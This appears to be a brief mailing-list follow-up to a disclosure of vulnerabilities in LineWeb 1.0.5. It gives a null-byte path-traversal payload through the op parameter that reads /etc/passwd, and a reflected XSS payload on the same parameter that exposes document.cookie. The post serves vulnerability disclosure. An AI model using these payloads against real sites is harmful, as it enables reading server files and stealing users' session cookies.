One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00
And ?op is vulnerable to a xss attack, IE: index.php?op=<script>alert(document.cookie)</script> Ignacio.
- Multiple vulnerabilities in LineWeb 1.0.5 ign . sec
- Re: Multiple vulnerabilities in LineWeb 1.0.5 ign . sec
